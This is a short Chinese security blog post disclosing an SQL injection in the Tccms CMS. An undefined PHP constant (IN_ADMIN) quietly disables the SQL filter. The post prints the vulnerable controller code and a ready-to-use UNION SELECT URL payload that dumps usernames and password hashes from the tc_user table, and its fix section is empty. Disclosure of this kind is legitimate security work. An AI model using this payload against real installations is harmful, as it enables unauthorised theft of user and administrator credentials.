时间: 2020-10-11|tag: 24次围观|0 条评论

常量未定义。

看到 /system/core/controller.class.php
 

private function forceAttack() {
        $attack = M('attack');
    if (Config::get("blackcheck") == 1 && !defined('IN_ADMIN') && $_GET['ac'] != 'common_newCode') {
    $canBePass = $attack->checkForbidden();
        if ($canBePass) {
            $this->setValue("error", Config::lang("YOUAREPROHIBITED"));
            $this->forward("error.html");
            exit;
        }
}

        if (Config::get("checkHack") && IN_ADMIN != TRUE) {
            $attack->initLogHacker();
        }
    }

当Config::get("checkHack") && IN_ADMIN != TRUE 时 调用 initLogHacker,过滤sql。

checkHack默认是为true的 然而 IN_ADMIN 常量是未定义的 在 php中 如果使用了一个未定义的常量,PHP 假定想要的是该常量本身的名字,如同用字符串调用它一样(CONSTANT 对应 "CONSTANT")。此时将发出一个 E_NOTICE 级的错误(参考 http://php.net/manual/zh/language.constants.syntax.php)

此时 IN_ADMIN = "IN_ADMIN " 所以 为 true的。

if (Config::get("checkHack") && IN_ADMIN != TRUE) 逻辑不成立 导致 sql过滤函数调用失败。

我们注册用户后

访问

http://localhost/index.php?ac=news_all&yz=1%20union%20select%20group_concat%28username,0x23,password%29,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29%20from%20tc_user%23

 

Tccms sql注入#2 – 网站安全 – 自学php插图

爆出管理员在内的所有用户信息

 

修复方案:

修复~~

    上一篇: cmseasy 存储型XSS一枚(无需登录无视360) - 网站安全

    下一篇: 东软UniEAP某jige通用漏洞打包 - 网站安全 - 自学
本博客所有文章如无特别注明均为原创。
复制或转载请以超链接形式注明转自起风了,原文地址《Tccms sql注入#2 – 网站安全 – 自学php
   

还没有人抢沙发呢~